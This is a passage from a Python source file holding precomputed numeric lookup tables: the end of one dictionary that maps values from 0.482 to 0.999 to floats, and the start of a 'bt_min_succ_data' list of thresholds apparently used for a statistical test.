0.482: 0.12326973572942887, 0.483: 0.12360850330134049, 0.484: 0.12394779548463959, 0.485: 0.12428761411078311, 0.486: 0.124627961021199, 0.487: 0.12496883806734783, 0.488: 0.12531024711081143, 0.489: 0.1256521900233532, 0.49: 0.12599466868701625, 0.491: 0.1263376849941603, 0.492: 0.12668124084758633, 0.493: 0.12702533816057304, 0.494: 0.12736997885698464, 0.495: 0.1277151648713401, 0.496: 0.12806089814888133, 0.497: 0.1284071806456874, 0.498: 0.12875401432871114, 0.499: 0.12910140117589755, 0.5: 0.1294493431762619, 0.501: 0.12979784232994518, 0.502: 0.1301469006483328, 0.503: 0.13049652015414506, 0.504: 0.13084670288147476, 0.505: 0.13119745087593734, 0.506: 0.13154876619470057, 0.507: 0.13190065090662206, 0.508: 0.13225310709230625, 0.509: 0.13260613684422873, 0.51: 0.13295974226678015, 0.511: 0.1333139254764025, 0.512: 0.1336686886016622, 0.513: 0.13402403378335564, 0.514: 0.13437996317458453, 0.515: 0.13473647894087462, 0.516: 0.13509358326026316, 0.517: 0.13545127832339895, 0.518: 0.13580956633363708, 0.519: 0.13616844950714427, 0.52: 0.136527930072998, 0.521: 0.13688801027328987, 0.522: 0.13724869236323353, 0.523: 0.13760997861126137, 0.524: 0.1379718712991265, 0.525: 0.13833437272202093, 0.526: 0.1386974851886771, 0.527: 0.1390612110214796, 0.528: 0.13942555255657146, 0.529: 0.13979051214395583, 0.53: 0.14015609214763355, 0.531: 0.14052229494569438, 0.532: 0.14088912293043793, 0.533: 0.14125657850848247, 0.534: 0.1416246641008996, 0.535: 0.14199338214330975, 0.536: 0.1423627350860244, 0.537: 0.14273272539413945, 0.538: 0.14310335554768486, 0.539: 0.14347462804172595, 0.54: 0.1438465453864995, 0.541: 0.1442191101075287, 0.542: 0.14459232474577235, 0.543: 0.1449661918577153, 0.544: 0.14534071401553914, 0.545: 0.1457158938072179, 0.546: 0.14609173383668234, 0.547: 0.14646823672391804, 0.548: 0.14684540510512592, 0.549: 0.14722324163286887, 0.55: 0.14760174897616385, 0.551: 0.14798092982066696, 0.552: 0.14836078686879586, 0.553: 0.1487413228398762, 0.554: 
0.14912254047027446, 0.555: 0.14950444251355421, 0.556: 0.14988703174062287, 0.557: 0.15027031093987303, 0.558: 0.15065428291734878, 0.559: 0.15103895049687566, 0.56: 0.15142431652022192, 0.561: 0.15181038384726742, 0.562: 0.1521971553561463, 0.563: 0.15258463394339888, 0.564: 0.15297282252415018, 0.565: 0.1533617240322658, 0.566: 0.15375134142050884, 0.567: 0.15414167766070536, 0.568: 0.15453273574392945, 0.569: 0.1549245186806466, 0.57: 0.15531702950090986, 0.571: 0.1557102712545081, 0.572: 0.1561042470111676, 0.573: 0.15649895986070417, 0.574: 0.15689441291321915, 0.575: 0.15729060929927896, 0.576: 0.1576875521700936, 0.577: 0.1580852446976913, 0.578: 0.1584836900751271, 0.579: 0.15888289151666476, 0.58: 0.15928285225796399, 0.581: 0.1596835755562652, 0.582: 0.16008506469061237, 0.583: 0.16048732296202217, 0.584: 0.16089035369370905, 0.585: 0.16129416023126705, 0.586: 0.16169874594289305, 0.587: 0.16210411421957827, 0.588: 0.16251026847533698, 0.589: 0.16291721214739183, 0.59: 0.16332494869642622, 0.591: 0.16373348160675336, 0.592: 0.1641428143865904, 0.593: 0.1645529505682422, 0.594: 0.16496389370832842, 0.595: 0.16537564738804714, 0.596: 0.16578821521334683, 0.597: 0.16620160081521945, 0.598: 0.16661580784990357, 0.599: 0.16703083999912705, 0.6: 0.1674467009703354, 0.601: 0.16786339449698484, 0.602: 0.16828092433873468, 0.603: 0.16869929428172162, 0.604: 0.169118508138823, 0.605: 0.1695385697498988, 0.606: 0.16995948298204558, 0.607: 0.17038125172989044, 0.608: 0.17080387991581378, 0.609: 0.17122737149026232, 0.61: 0.17165173043198836, 0.611: 0.1720769607483454, 0.612: 0.17250306647555386, 0.613: 0.1729300516790017, 0.614: 0.17335792045351325, 0.615: 0.1737866769236534, 0.616: 0.17421632524401046, 0.617: 0.1746468695994971, 0.618: 0.17507831420565434, 0.619: 0.17551066330896237, 0.62: 0.17594392118712604, 0.621: 0.17637809214942018, 0.622: 0.1768131805369832, 0.623: 0.17724919072313622, 0.624: 0.17768612711373116, 0.625: 0.17812399414744517, 0.626: 
0.1785627962961532, 0.627: 0.17900253806524002, 0.628: 0.17944322399393162, 0.629: 0.17988485865567744, 0.63: 0.180327446658469, 0.631: 0.18077099264520646, 0.632: 0.1812155012940707, 0.633: 0.18166097731887176, 0.634: 0.1821074254694106, 0.635: 0.18255485053187898, 0.636: 0.18300325732921507, 0.637: 0.18345265072150788, 0.638: 0.18390303560636884, 0.639: 0.18435441691933233, 0.64: 0.18480679963426472, 0.641: 0.18526018876376166, 0.642: 0.1857145893595442, 0.643: 0.18617000651289878, 0.644: 0.18662644535509104, 0.645: 0.1870839110577722, 0.646: 0.18754240883345613, 0.647: 0.18800194393592007, 0.648: 0.18846252166064992, 0.649: 0.18892414734532698, 0.65: 0.18938682637023913, 0.651: 0.18985056415878246, 0.652: 0.19031536617790407, 0.653: 0.19078123793859408, 0.654: 0.19124818499635504, 0.655: 0.19171621295171193, 0.656: 0.19218532745069095, 0.657: 0.1926555341853225, 0.658: 0.19312683889416116, 0.659: 0.19359924736280187, 0.66: 0.19407276542439827, 0.661: 0.19454739896019313, 0.662: 0.1950231539000885, 0.663: 0.1955000362231294, 0.664: 0.19597805195812434, 0.665: 0.19645720718417137, 0.666: 0.1969375080312527, 0.667: 0.19741896068079068, 0.668: 0.1979015713662402, 0.669: 0.19838534637370456, 0.67: 0.1988702920425144, 0.671: 0.19935641476587196, 0.672: 0.19984372099143724, 0.673: 0.20033221722198943, 0.674: 0.20082191001605193, 0.675: 0.20131280598855258, 0.676: 0.20180491181148238, 0.677: 0.20229823421455562, 0.678: 0.202792779985896, 0.679: 0.20328855597273982, 0.68: 0.20378556908210874, 0.681: 0.20428382628155384, 0.682: 0.20478333459984766, 0.683: 0.20528410112773196, 0.684: 0.20578613301867388, 0.685: 0.2062894374895787, 0.686: 0.20679402182159856, 0.687: 0.20729989336089943, 0.688: 0.20780705951945155, 0.689: 0.20831552777581072, 0.69: 0.20882530567596289, 0.691: 0.2093364008341447, 0.692: 0.20984882093367282, 0.693: 0.21036257372779668, 0.694: 0.2108776670405803, 0.695: 0.21139410876777068, 0.696: 0.2119119068777031, 0.697: 0.21243106941219608, 0.698: 
0.21295160448747266, 0.699: 0.21347352029512576, 0.7: 0.21399682510303225, 0.701: 0.21452152725634926, 0.702: 0.21504763517848402, 0.703: 0.21557515737209668, 0.704: 0.21610410242011052, 0.705: 0.2166344789867689, 0.706: 0.2171662958186337, 0.707: 0.21769956174571664, 0.708: 0.21823428568248668, 0.709: 0.21877047662904875, 0.71: 0.2193081436722041, 0.711: 0.2198472959866113, 0.712: 0.2203879428359658, 0.713: 0.22093009357411275, 0.714: 0.22147375764632216, 0.715: 0.22201894459043073, 0.716: 0.22256566403813283, 0.717: 0.22311392571621594, 0.718: 0.22366373944783802, 0.719: 0.22421511515382514, 0.72: 0.2247680628540138, 0.721: 0.22532259266856458, 0.722: 0.22587871481936841, 0.723: 0.22643643963140753, 0.724: 0.22699577753418013, 0.725: 0.2275567390631562, 0.726: 0.22811933486122538, 0.727: 0.2286835756801963, 0.728: 0.2292494723823189, 0.729: 0.22981703594182484, 0.73: 0.23038627744649448, 0.731: 0.23095720809927242, 0.732: 0.23152983921988868, 0.733: 0.2321041822464993, 0.734: 0.23268024873742021, 0.735: 0.23325805037279204, 0.736: 0.23383759895636017, 0.737: 0.23441890641727506, 0.738: 0.23500198481185625, 0.739: 0.23558684632547633, 0.74: 0.23617350327442724, 0.741: 0.23676196810786698, 0.742: 0.23735225340971805, 0.743: 0.23794437190069778, 0.744: 0.23853833644033903, 0.745: 0.2391341600290356, 0.746: 0.23973185581016365, 0.747: 0.2403314370722066, 0.748: 0.24093291725095917, 0.749: 0.2415363099317333, 0.75: 0.24214162885164442, 0.751: 0.24274888790188998, 0.752: 0.24335810113014295, 0.753: 0.2439692827429402, 0.754: 0.244582447108108, 0.755: 0.24519760875728072, 0.756: 0.24581478238846102, 0.757: 0.24643398286857535, 0.758: 0.24705522523614448, 0.759: 0.247678524703978, 0.76: 0.2483038966619244, 0.761: 0.2489313566797009, 0.762: 0.24956092050970227, 0.763: 0.2501926040899815, 0.764: 0.25082642354721935, 0.765: 0.251462395199727, 0.766: 0.25210053556061046, 0.767: 0.25274086134088347, 0.768: 0.2533833894527322, 0.769: 0.25402813701282223, 0.77: 
0.25467512134563586, 0.771: 0.25532435998694697, 0.772: 0.255975870687307, 0.773: 0.25662967141564796, 0.774: 0.25728578036293126, 0.775: 0.257944215945903, 0.776: 0.25860499681089555, 0.777: 0.25926814183775904, 0.778: 0.2599336701437952, 0.779: 0.2606016010878805, 0.78: 0.26127195427462435, 0.781: 0.26194474955857344, 0.782: 0.2626200070486076, 0.783: 0.26329774711236986, 0.784: 0.26397799038077596, 0.785: 0.2646607577527068, 0.786: 0.2653460703996925, 0.787: 0.26603394977082295, 0.788: 0.26672441759766086, 0.789: 0.26741749589934827, 0.79: 0.26811320698777924, 0.791: 0.2688115734729059, 0.792: 0.2695126182681659, 0.793: 0.27021636459605924, 0.794: 0.270922835993805, 0.795: 0.2716320563191784, 0.796: 0.2723440497564509, 0.797: 0.2730588408225018, 0.798: 0.27377645437302944, 0.799: 0.27449691560896095, 0.8: 0.27522025008299583, 0.801: 0.27594648370626207, 0.802: 0.2766756427552376, 0.803: 0.27740775387872363, 0.804: 0.2781428441050571, 0.805: 0.2788809408495003, 0.806: 0.27962207192177896, 0.807: 0.2803662655338274, 0.808: 0.2811135503077288, 0.809: 0.2818639552838439, 0.81: 0.2826175099291502, 0.811: 0.28337424414582163, 0.812: 0.28413418827992953, 0.813: 0.28489737313051333, 0.814: 0.2856638299587509, 0.815: 0.28643359049743594, 0.816: 0.2872066869607032, 0.817: 0.28798315205396063, 0.818: 0.2887630189841298, 0.819: 0.28954632147014897, 0.82: 0.2903330937537252, 0.821: 0.2911233706104174, 0.822: 0.2919171873609755, 0.823: 0.2927145798830292, 0.824: 0.2935155846230349, 0.825: 0.2943202386086293, 0.826: 0.2951285794612334, 0.827: 0.2959406454090917, 0.828: 0.296756475300599, 0.829: 0.29757610861805905, 0.83: 0.29839958549179174, 0.831: 0.29922694671465455, 0.832: 0.30005823375696744, 0.833: 0.3008934887818879, 0.834: 0.3017327546612134, 0.835: 0.30257607499161887, 0.836: 0.30342349411142644, 0.837: 0.304275057117819, 0.838: 0.3051308098845464, 0.839: 0.30599079908023513, 0.84: 0.3068550721871839, 0.841: 0.3077236775206872, 0.842: 0.3085966642490721, 0.843: 
0.3094740824141966, 0.844: 0.3103559829527036, 0.845: 0.3112424177178285, 0.846: 0.3121334395019754, 0.847: 0.3130291020598767, 0.848: 0.31392946013267803, 0.849: 0.3148345694725149, 0.85: 0.31574448686815393, 0.851: 0.31665927017126166, 0.852: 0.3175789783235609, 0.853: 0.31850367138497404, 0.854: 0.31943341056253666, 0.855: 0.32036825824038817, 0.856: 0.3213082780106422, 0.857: 0.3222535347054343, 0.858: 0.32320409442988757, 0.859: 0.3241600245963502, 0.86: 0.32512139395965584, 0.861: 0.3260882726537293, 0.862: 0.3270607322293416, 0.863: 0.3280388456932857, 0.864: 0.32902268754886954, 0.865: 0.33001233383784195, 0.866: 0.33100786218383216, 0.867: 0.3320093518373427, 0.868: 0.33301688372237925, 0.869: 0.3340305404847731, 0.87: 0.3350504065422603, 0.871: 0.33607656813651987, 0.872: 0.33710911338693283, 0.873: 0.3381481323466401, 0.874: 0.33919371706047996, 0.875: 0.3402459616253203, 0.876: 0.3413049622526002, 0.877: 0.34237081733338237, 0.878: 0.34344362750587093, 0.879: 0.344523495725656, 0.88: 0.3456105273387513, 0.881: 0.34670483015749626, 0.882: 0.3478065145396591, 0.883: 0.3489156934706179, 0.884: 0.3500324826490219, 0.885: 0.3511570005760081, 0.886: 0.35228936864811067, 0.887: 0.35342971125409106, 0.888: 0.35457815587599106, 0.889: 0.35573483319437665, 0.89: 0.35689987719830346, 0.891: 0.3580734253000495, 0.892: 0.3592556184548126, 0.893: 0.36044660128589723, 0.894: 0.3616465222155064, 0.895: 0.36285553360138006, 0.896: 0.3640737918798012, 0.897: 0.3653014577152351, 0.898: 0.3665386961568701, 0.899: 0.36778567680270435, 0.9: 0.3690425739712867, 0.901: 0.37030956688192357, 0.902: 0.3715868398434812, 0.903: 0.37287458245257316, 0.904: 0.3741729898016013, 0.905: 0.37548226269719714, 0.906: 0.3768026078897954, 0.907: 0.378134238314937, 0.908: 0.37947737334708087, 0.909: 0.38083223906674324, 0.91: 0.38219906854181984, 0.911: 0.3835781021239361, 0.912: 0.38496958776079576, 0.913: 0.38637378132577954, 0.914: 0.3877909469657132, 0.915: 0.38922135746822073, 0.916: 
0.39066529464976885, 0.917: 0.3921230497662107, 0.918: 0.3935949239469887, 0.919: 0.3950812286550077, 0.92: 0.39658228617383234, 0.921: 0.3980984301243421, 0.922: 0.39963000601279863, 0.923: 0.4011773718129906, 0.924: 0.4027408985847371, 0.925: 0.4043209711317251, 0.926: 0.40591798870156176, 0.927: 0.4075323657317996, 0.928: 0.4091645326448546, 0.929: 0.41081493669652935, 0.93: 0.41248404288216023, 0.931: 0.41417233490523914, 0.932: 0.41588031621383637, 0.933: 0.41760851111052566, 0.934: 0.4193574659425829, 0.935: 0.4211277503789231, 0.936: 0.42291995878221855, 0.937: 0.42473471168447596, 0.938: 0.42657265737574357, 0.939: 0.4284344736166483, 0.94: 0.43032086948677106, 0.941: 0.432232587381485, 0.942: 0.43417040517298744, 0.943: 0.4361351385507812, 0.944: 0.4381276435612516, 0.945: 0.44014881936622124, 0.946: 0.44219961124405294, 0.947: 0.44428101385974056, 0.948: 0.4463940748332428, 0.949: 0.44853989864010696, 0.95: 0.4507196508818678, 0.951: 0.4529345629700977, 0.952: 0.45518593727289863, 0.953: 0.45747515278081924, 0.954: 0.45980367135633604, 0.955: 0.46217304464121944, 0.956: 0.4645849217079045, 0.957: 0.4670410575530351, 0.958: 0.46954332254848785, 0.959: 0.4720937129834131, 0.96: 0.47469436285272015, 0.961: 0.47734755707524595, 0.962: 0.4800557463561398, 0.963: 0.4828215639469468, 0.964: 0.4856478446055499, 0.965: 0.4885376461125343, 0.966: 0.4914942737745481, 0.967: 0.49452130842950337, 0.968: 0.4976226385777961, 0.969: 0.5008024973958326, 0.97: 0.5040655055604257, 0.971: 0.5074167210204681, 0.972: 0.5108616971284513, 0.973: 0.5144065508883955, 0.974: 0.5180580435286398, 0.975: 0.5218236761943078, 0.976: 0.5257118043278883, 0.977: 0.5297317753353202, 0.978: 0.5338940955221816, 0.979: 0.5382106341669483, 0.98: 0.5426948752053159, 0.981: 0.5473622306342155, 0.982: 0.5522304349152825, 0.983: 0.5573200471216728, 0.984: 0.5626550985532288, 0.985: 0.5682639400343021, 0.986: 0.574180368432149, 0.987: 0.5804451518443972, 0.988: 0.5871081376193765, 0.989: 
0.5942312358276155, 0.99: 0.6018927595381185, 0.991: 0.6101939464147714, 0.992: 0.6192691432165274, 0.993: 0.6293024734013033, 0.994: 0.6405567501490285, 0.995: 0.653427511088023, 0.996: 0.6685545316863031, 0.997: 0.687086469892058, 0.998: 0.7114599543785525, 0.999: 0.7488112942693539}} # noqa: E501, E231 bt_min_succ_data = {'num_bt = 1000, alpha = 0.1': [0.00010537719726562501, 0.00053192138671875, 0.0011025695800781247, 0.001745849609375, 0.002434478759765625, 0.0031548461914062496, 0.0038988952636718746, 0.004661621093749999, 0.0054394836425781246, 0.00622998046875, 0.007031219482421876, 0.007841796875000001, 0.008660491943359376, 0.009486450195312503, 0.010318756103515628, 0.011156921386718754, 0.01200039672851563, 0.012848632812500007, 0.013701263427734384, 0.014557983398437509, 0.015418487548828134, 0.01628247070312501, 0.017149749755859388, 0.018020080566406263, 0.01889334106445314, 0.019769226074218764, 0.02064773559570314, 0.021528625488281265, 0.022411773681640636, 0.02329711914062501, 0.024184600830078132, 0.025073974609375008, 0.025965240478515637, 0.026858337402343765, 0.027753143310546888, 0.028649597167968763, 0.029547637939453135, 0.030447204589843763, 0.031348175048828135, 0.03225061035156251, 0.03315444946289064, 0.03405950927734376, 0.03496591186523438, 0.035873535156250004, 0.03678231811523438, 0.037692199707031256, 0.03860324096679688, 0.03951538085937501, 0.04042855834960939, 0.041342712402343766, 0.04225790405273439, 0.043174011230468774, 0.04409109497070315, 0.04500903320312503, 0.04592788696289065, 0.046847595214843774, 0.04776815795898439, 0.04868951416015627, 0.0496116638183594, 0.050534606933593774, 0.05145828247070316, 0.05238275146484379, 0.05330795288085941, 0.054233825683593785, 0.05516036987304691, 0.05608764648437504, 0.05701559448242192, 0.0579441528320313, 0.058873382568359424, 0.05980322265625005, 0.060733673095703176, 0.0616647338867188, 0.06259634399414066, 0.06352856445312505, 0.06446139526367192, 0.06539471435546879, 
0.06632864379882816, 0.06726306152343753, 0.06819802856445314, 0.06913348388671878, 0.07006948852539066, 0.07100598144531253, 0.07194296264648442, 0.07288037109375006, 0.07381832885742196, 0.07475677490234384, 0.07569564819335947, 0.07663494873046883, 0.07757473754882821, 0.07851495361328134, 0.0794555969238282, 0.08039666748046884, 0.0813381652832032, 0.08228002929687508, 0.08322238159179696, 0.08416510009765632, 0.08510824584960947, 0.0860517578125001, 0.08699563598632823, 0.08793994140625011, 0.08888455200195325, 0.08982958984375011, 0.0907749938964845, 0.09172076416015637, 0.0926668395996095, 0.09361334228515636, 0.09456015014648447, 0.0955073242187501, 0.09645480346679697, 0.09740264892578135, 0.09835079956054699, 0.09929931640625012, 0.10024807739257824, 0.10119726562500012, 0.10214669799804699, 0.10309643554687511, 0.10404653930664076, 0.10499694824218764, 0.10594760131835951, 0.10689855957031263, 0.10784988403320328, 0.10880145263671892, 0.10975332641601579, 0.11070544433593765, 0.11165786743164077, 0.11261059570312515, 0.11356356811523452, 0.11451684570312515, 0.11547036743164077, 0.11642419433593765, 0.11737826538085952, 0.11833258056640639, 0.11928720092773451, 0.12024206542968766, 0.1211971740722658, 0.12215252685546893, 0.12310818481445332, 0.12406402587890647, 0.12502017211914085, 0.12597650146484402, 0.12693313598632844, 0.1278899536132816, 0.128847076416016, 0.12980438232421915, 0.13076193237304728, 0.13171972656250042, 0.13267776489257854, 0.13363598632812546, 0.13459445190429736, 0.13555316162109426, 0.13651211547851616, 0.1374712524414068, 0.1384306335449224, 0.13939019775390682, 0.14035000610351622, 0.14130999755859436, 0.1422702331542975, 0.14323065185546935, 0.1441913146972662, 0.14515216064453185, 0.14611318969726622, 0.14707446289062565, 0.1480359191894538, 0.14899761962890695, 0.14995944213867257, 0.15092150878906319, 0.1518837585449226, 0.15284625244140698, 0.15380886840820385, 0.1547717285156257, 0.1557347717285163, 0.15669799804687568, 
0.15766140747070378, 0.15862500000000063, 0.15958877563476626, 0.16055273437500062, 0.16151693725586003, 0.1624812622070319, 0.16344577026367252, 0.16441046142578192, 0.16537533569336005, 0.1663403930664069, 0.1673056335449225, 0.1682710571289069, 0.16923660278320374, 0.17020239257812564, 0.17116830444336, 0.17213439941406317, 0.17310067749023506, 0.17406707763671947, 0.17503372192382888, 0.17600048828125076, 0.17696737670898516, 0.17793450927734455, 0.17890176391601642, 0.17986920166015702, 0.18083676147461014, 0.18180456542968826, 0.18277243041992264, 0.18374053955078207, 0.18470877075195397, 0.1856771240234384, 0.18664566040039154, 0.18761437988281343, 0.18858322143554784, 0.189552246093751, 0.1905213928222666, 0.191490722656251, 0.19246017456054787, 0.19342980957031353, 0.19439956665039165, 0.19536950683593857, 0.196339569091798, 0.1973097534179699, 0.19828012084961055, 0.19925061035156372, 0.2002212829589856, 0.20119207763672003, 0.20216299438476693, 0.20313409423828255, 0.2041053161621107, 0.20507672119140757, 0.20604818725586072, 0.2070198364257826, 0.2079916687011732, 0.20896356201172006, 0.20993563842773566, 0.21090783691406378, 0.21188021850586064, 0.21285266113281376, 0.21382528686523566, 0.21479803466797004, 0.21577090454101694, 0.21674395751953257, 0.21771707153320446, 0.2186903686523451, 0.21966378784179824, 0.22063732910156386, 0.221610992431642, 0.22258483886718888, 0.22355874633789202, 0.2245328369140639, 0.2255070495605483, 0.22648138427734515, 0.22745584106445454, 0.2284304199218764, 0.2294051208496108, 0.23037994384765764, 0.23135494995117323, 0.23233001708984508, 0.23330520629882945, 0.23428057861328255, 0.23525601196289192, 0.23623162841797002, 0.23720730590820438, 0.23818316650390753, 0.23915908813476694, 0.24013519287109508, 0.2411113586425795, 0.24208764648437636, 0.24306411743164197, 0.24404064941406384, 0.24501730346679823, 0.24599414062500136, 0.24697103881836074, 0.2479480590820326, 0.24892520141601698, 0.24990246582031383, 
0.25087985229492316, 0.251857360839845, 0.2528349304199231, 0.25381268310547, 0.25479049682617305, 0.2557684936523449, 0.256746551513673, 0.2577247314453136, 0.25870303344726675, 0.2596814575195324, 0.26065994262695436, 0.26163861083984497, 0.26261734008789184, 0.26359619140625123, 0.26457516479492316, 0.2655542602539076, 0.2665334167480483, 0.2675127563476577, 0.26849215698242335, 0.2694716796875015, 0.2704513244628922, 0.2714310302734392, 0.2724109191894548, 0.2733908691406267, 0.27437094116211114, 0.2753510742187518, 0.2763313293457049, 0.2773117675781268, 0.2782922058105487, 0.2792728271484394, 0.2802535095214863, 0.28123431396484566, 0.28221524047851754, 0.28319628906250194, 0.2841773986816426, 0.2851586303710957, 0.286139923095705, 0.28712139892578314, 0.28810293579101753, 0.28908459472656445, 0.2900663146972675, 0.2910481567382831, 0.2920301208496112, 0.2930121459960956, 0.2939942932128925, 0.2949765625000019, 0.2959589538574239, 0.296941406250002, 0.29792391967773635, 0.2989066162109395, 0.2998893737792989, 0.3008721923828146, 0.30185519409179906, 0.3028382568359398, 0.3038213806152368, 0.3048046264648462, 0.3057879943847681, 0.30677148437500257, 0.3077550354003933, 0.30873864746094026, 0.3097224426269559, 0.3107062377929716, 0.311690216064456, 0.3126742553710967, 0.3136583557128937, 0.31464263916015933, 0.315626922607425, 0.3166113891601594, 0.3175959167480501, 0.31858050537109706, 0.3195652160644564, 0.3205500488281283, 0.3215349426269565, 0.32251995849609716, 0.3235050354003941, 0.32449023437500346, 0.3254754943847691, 0.3264608764648472, 0.3274463806152379, 0.32843194580078483, 0.3294175720214879, 0.3304033813476598, 0.33138919067383166, 0.33237512207031605, 0.333361175537113, 0.33434729003906616, 0.33533352661133187, 0.33631982421875384, 0.3373062438964882, 0.33829272460937887, 0.33927932739258204, 0.3402659912109415, 0.34125277709961344, 0.34223962402344166, 0.3432265930175824, 0.3442136230468794, 0.34520077514648884, 0.3461879882812545, 
0.34717532348633273, 0.3481627197265672, 0.34915017700195794, 0.35013781738281735, 0.35112545776367676, 0.3521132202148487, 0.35310110473633316, 0.3540890502929739, 0.35507705688477087, 0.35606518554688027, 0.3570534362793022, 0.3580417480468804, 0.35903012084961483, 0.3600186157226618, 0.36100717163086493, 0.3619957885742243, 0.3629845886230525, 0.36397338867188067, 0.36496231079102137, 0.3659513549804745, 0.3669403991699276, 0.3679296264648495, 0.3689188537597714, 0.3699082641601621, 0.3708976745605528, 0.3718872070312559, 0.3728768615722715, 0.3738665771484434, 0.37485635375977155, 0.37584625244141223, 0.37683621215820917, 0.37782623291016226, 0.3788163757324279, 0.379806640625006, 0.38079690551758416, 0.3817873535156311, 0.382777801513678, 0.38376837158203736, 0.3847590637207092, 0.3857497558593811, 0.38674063110352175, 0.3877315063476624, 0.38872250366211547, 0.38971362304688106, 0.39070474243164666, 0.39169604492188104, 0.3926873474121154, 0.3936787719726623, 0.39467031860352164, 0.39566186523438096, 0.3966535339355528, 0.3976453247070372, 0.3986371765136778, 0.3996290893554747, 0.4006211242675841, 0.4016132202148498, 0.40260537719727174, 0.4035976562500061, 0.4045899963378967, 0.40558245849609986, 0.40657498168945927, 0.40756756591797494, 0.40856027221680313, 0.4095530395507876, 0.4105458679199283, 0.41153881835938144, 0.41253182983399084, 0.4135249023437565, 0.4145180969238347, 0.4155113525390691, 0.4165047302246161, 0.4174981689453192, 0.4184916687011786, 0.4194852905273505, 0.4204789733886787, 0.4214727172851631, 0.42246658325196007, 0.4234605102539132, 0.42445449829102255, 0.42544860839844445, 0.4264427795410226, 0.42743701171875703, 0.428431365966804, 0.4294257812500071, 0.4304203186035227, 0.4314149169921946, 0.43240957641602273, 0.43340429687500714, 0.4343991394043041, 0.43539404296875717, 0.4363890686035228, 0.43738415527344465, 0.4383793029785228, 0.43937457275391345, 0.4403698425293041, 0.44136529541016345, 0.4423607482910228, 0.44335632324219465, 
0.4443519592285228, 0.4453477172851634, 0.44634353637696034, 0.4473394165039134, 0.448335418701179, 0.44933148193360084, 0.45032760620117895, 0.4513238525390696, 0.4523201599121165, 0.45331652832031955, 0.45431295776367886, 0.4553095092773507, 0.45630618286133506, 0.45730285644531943, 0.4582996520996163, 0.45929650878906936, 0.4602934875488349, 0.46129052734375675, 0.46228762817383484, 0.46328485107422546, 0.46428213500977233, 0.46527947998047536, 0.46627688598633465, 0.46727441406250647, 0.46827200317383455, 0.46926971435547515, 0.470267486572272, 0.47126531982422515, 0.4722632751464908, 0.47326123046875646, 0.4742593688964908, 0.4752575073242251, 0.47625576782227197, 0.4772540893554751, 0.47825247192383447, 0.47925097656250637, 0.48024954223633454, 0.48124822998047523, 0.4822469787597722, 0.4832457885742253, 0.48424465942383466, 0.48524365234375655, 0.4862427062988347, 0.4872418212890691, 0.48824105834961606, 0.48924035644531916, 0.4902397155761785, 0.4912391967773504, 0.49223873901367854, 0.4932384033203192, 0.4942380676269599, 0.49523785400391296, 0.49623776245117857, 0.4972376708984442, 0.4982377014160223, 0.49923785400391296, 0.5002380065918036, 0.5012382812500068, 0.5022386779785225, 0.5032390747070382, 0.5042395935058663, 0.505240234375007, 0.5062408752441475, 0.5072416381836006, 0.5082425231933662, 0.5092434082031317, 0.5102444152832099, 0.5112454833984442, 0.5122466735839911, 0.5132479248046943, 0.5142492370605537, 0.5152506713867255, 0.5162521667480537, 0.5172537231445381, 0.5182554016113349, 0.5192571411132879, 0.5202589416503972, 0.521260864257819, 0.5222628479003971, 0.5232648925781315, 0.5242670593261783, 0.5252692871093815, 0.5262715759277409, 0.5272739868164127, 0.5282764587402409, 0.5292790527343815, 0.530281646728522, 0.531284362792975, 0.5322872009277405, 0.5332901000976623, 0.5342930603027404, 0.5352960815429747, 0.5362992248535216, 0.5373024291992247, 0.5383057556152403, 0.5393091430664122, 0.5403125915527404, 0.541316162109381, 
0.542319793701178, 0.5433234863281312, 0.544327301025397, 0.5453311767578188, 0.546335113525397, 0.5473391723632876, 0.5483432922363344, 0.5493475341796937, 0.5503517761230531, 0.5513562011718812, 0.5523606262207094, 0.55336517333985, 0.5543698425293032, 0.5553745117187564, 0.5563793029785221, 0.5573842163086004, 0.5583891906738349, 0.5593942260742256, 0.5603993225097726, 0.5614045410156322, 0.5624098815918042, 0.563415222167976, 0.5644207458496165, 0.5654262695312572, 0.5664319152832104, 0.5674376220703198, 0.5684434509277417, 0.56944934082032, 0.5704552917480544, 0.5714613647461014, 0.5724674987793047, 0.5734737548828205, 0.5744800720214924, 0.5754864501953205, 0.576492950439461, 0.5774995727539142, 0.5785061950683673, 0.579512939453133, 0.5805198059082112, 0.5815267333984456, 0.5825337219238363, 0.5835408325195396, 0.5845480041503991, 0.5855552368164149, 0.586562591552743, 0.5875700073242273, 0.5885775451660241, 0.5895851440429772, 0.5905928649902429, 0.5916006469726648, 0.5926085510253992, 0.5936165161132899, 0.5946245422363369, 0.5956326904296964, 0.5966408996582121, 0.5976492309570403, 0.5986576232910245, 0.599666076660165, 0.6006746520996181, 0.6016833496093837, 0.6026921081543056, 0.6037009277343838, 0.6047098693847744, 0.6057188720703214, 0.6067279968261808, 0.6077371826171966, 0.6087464904785247, 0.6097558593750089, 0.6107653503418057, 0.6117749023437588, 0.6127845764160244, 0.6137943115234462, 0.6148041076660243, 0.615814025878915, 0.6168240661621182, 0.6178341674804776, 0.6188443298339933, 0.6198546142578214, 0.6208650207519618, 0.6218754882812586, 0.6228860168457117, 0.6238966674804772, 0.6249074401855553, 0.6259182739257897, 0.6269291687011803, 0.6279401855468835, 0.6289513244628991, 0.629962524414071, 0.6309738464355553, 0.6319852294921958, 0.6329966735839926, 0.6340083007812581, 0.6350199279785237, 0.636031738281258, 0.6370436096191486, 0.6380555419921955, 0.6390675964355549, 0.6400797119140705, 0.6410919494628986, 0.6421043090820392, 
0.6431167297363359, 0.6441292724609452, 0.6451418762207107, 0.6461546020507888, 0.6471674499511794, 0.6481803588867262, 0.6491933288574293, 0.6502064208984449, 0.651219635009773, 0.6522329711914135, 0.6532463684082103, 0.6542598266601632, 0.6552734069824288, 0.6562871093750068, 0.6573009338378973, 0.6583148193359442, 0.6593288269043035, 0.6603428955078191, 0.6613570861816471, 0.6623713378906314, 0.6633857727050844, 0.6644002075195373, 0.6654148254394591, 0.6664295043945371, 0.6674443054199276, 0.6684591674804744, 0.6694741516113337, 0.6704892578125056, 0.6715044860839899, 0.6725197753906306, 0.6735351867675837, 0.6745506591796931, 0.675566253662115, 0.6765819702148493, 0.6775978088378961, 0.6786137084960991, 0.6796297302246147, 0.6806458740234428, 0.6816621398925834, 0.6826784667968803, 0.6836949157714897, 0.6847114257812553, 0.6857281188964898, 0.6867448730468805, 0.6877617492675837, 0.6887786865234432, 0.6897958068847714, 0.6908129882812556, 0.6918302917480524, 0.6928476562500056, 0.6938652038574274, 0.6948828125000056, 0.6959005432128963, 0.6969183959960995, 0.6979363708496152, 0.6989544067382871, 0.6999726257324276, 0.7009909057617244, 0.7020093078613338, 0.7030278320312556, 